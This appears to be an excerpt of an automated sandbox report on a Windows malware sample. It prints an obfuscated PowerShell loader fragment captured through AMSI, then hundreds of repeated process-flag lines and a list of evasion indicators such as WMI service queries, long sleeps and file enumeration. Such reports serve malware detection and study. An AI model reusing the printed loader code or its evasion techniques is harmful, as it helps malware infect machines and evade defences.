              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: .lnKuvkQuan AuiCoanMelg ereThenHul=Skr(Opd$FriT C mFustOm e.un B.n- HaoRedrUpr Off$HosWkbeaRe rBasbBjelC,eeC rl Vii C,kAfse vr).rv ')Fusionsdokumentet (Drunkometer ' nt$Ro g TalSikoSpnbUn a etlPa : scLDisipirmtopbb si BreFles,trt K = aa$LyseSmunZonvGr :U fuHa,sBeee Rer Cop dgrS so Scf ,oit,rl Rue ff ')if($Blodsnkningen){ $Chemotherapeutics93=[char]34+$Udfrt+[char]34Fusionsdokumentet (Drunkometer ' ek$Ov.gTaklC toFrebLovaHjelEle:Brer Ada ComBrohFu.eChaaAktdSp,=cos[ GeTT.nyAfspSo,eF s]Men: re:RutGpeneBo,tdroTMagyTe.pDybe.anFungr.phoKo.mS rCUniLSubS CaIDioDP c(God$PosU inR,sbNonlCoriRevgkn.h S tScreDisdB.rlH ly ev)Reg ')Fusionsdokumentet (Drunkometer ' eg$ S,gAcclTa o Opb GoaRivlGlo:Es D Tei,yms ,ot FiaMarn Rec yneP,srirriEasnTidg at1dam8Or 1Ink=Stv[C rS Fay LbsSpatHvdeKlnm Vo.IndAef.cRt.tKooi UlvUmbaHistAr o S rTyn]Ana:Fis:He C A.rMure T a Pit .neOccISl.nUnesHestC,laF,rnCn cDene b(Har$SparSala,namMidhLameSe aMaxdRec)Eks ')Fusionsdokumentet (Drunkometer ' De$De.gAu.lF lo prb UdaPrjlBel:F rSTant beoS nrmalcHediasirMi.kRepl B esp rnykn obe ros ci Co= u J $b bD Bei VisPastPhoaCorn Sac leNumrspiiHennRifg od1 Re8Kor1.en. nI ott oseI,fmO d( R )sim ')if (!$Storcirklernes) {$Storcirklernes = $Distancering181.Item(0)}Fusionsdokumentet (Drunkometer 'Ser$De StoltBreo nvrAf.c k.i,nbrDick M,lGreeDedrCornMileMo sMon. nDBruoU scM ru om Wie ytnU,stBas.OmlATr p repSldlC riO dc waaJantStoiHaeoCycnFla. BaSTyphCore SylR.vlFalERepxTriePrac oiuDistOpteSup(Tra$ ReW BaaOx lTu lRnteOmrr Of,Kun$SteCButh eceAllmPr.oMu tXa.h cef rrP saChapStveOveu G tColi U.csuksSlg9Bog3Vgg, Ja$,lyL itiSh mNurb.ami neeBomsToutSku,Cou$K,nn euExalPomlDis,Le 0kic)Kla ')Fusionsdokumentet $ledelsesfunktionen}function Ulfhild ($Flagellationernes,$Hessian) {#Terminational Torskegilderne Bregnerod Omrystningers Folkekongresser Sanitrt topforhandlingerne Gteskabsbruddet Studieegnet Outquery Fusionsdokumentet (Drunkometer 'Sup$ResFKl.l raLeigMaleLiml ekl praskutSkdiTvaoNeunud e CorPrvn Anemons ik ol-PerbSttxNonoSter Re Unp$SluHHileUnesTopsUljiTaiaRugnBer ')#immunoelectrophoresis Kunstskjtelb Baadsmandspibens cerebropsychosis mastoiditis Preadornment Ozons Revibrational Unsweetness Murrain Alilonghi Underburned Vejvsenets Blokaders Bipods Computerbranchens Firevortex Garderobenumrene Vikledes Apokalypsens Saudiere Faktoranalyse Nonimmigration Birching Penalizes Regressions Turbinelike }#Jagttilladelserne Almswomen Sporingsstationens Bialis Optagelseskriteriets Sternway Driftsforstyrrelsers Dirigerende Lseplaners Amphistomatic Hjemfarnes Danmarksbilledernes Blresmlden Skambid Pensionrs Kriminalkommissrers Afgangsperrons Bararite afstemningsformen Semisevere Unevasively Brofogden Marselisborg flled marskernes lgmnds Function Meningsbaerende ($Sickishly, $Ufornuftigst = 0){$Whippable=2Fusionsdokumentet (Drunkometer 'udd$.rug SplW.so ,sbStyaM.tlalt:TraB Syu yrk ove ImtBoyrcogoIsts SaeEx Pr=K,e P eNTh.eAccwB.o-ArnOSagb V.jPleeRescPh,t An DobFasy.odtMeleReh[Ca ]lte .i(Smu$UnhSBezi DecReakC.li
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 12_2_004047CB LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,12_2_004047CB
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

              Malware Analysis System Evasion

              barindex
              Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Service
              Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Service
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,10_2_0040DD85
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6261Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3653Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1447Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 8312Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeAPI coverage: 9.1 %
              Source: C:\Windows\SysWOW64\msiexec.exeAPI coverage: 8.3 %
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 432Thread sleep time: -2767011611056431s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1816Thread sleep time: -3689348814741908s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 2028Thread sleep count: 177 > 30Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 2028Thread sleep time: -531000s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 2028Thread sleep count: 9806 > 30Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 2028Thread sleep time: -29418000s >= -30000sJump to behavior
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_1FC710F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,8_2_1FC710F1
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_0040AE51 FindFirstFileW,FindNextFileW,10_2_0040AE51
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 12_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,12_2_00407EF8
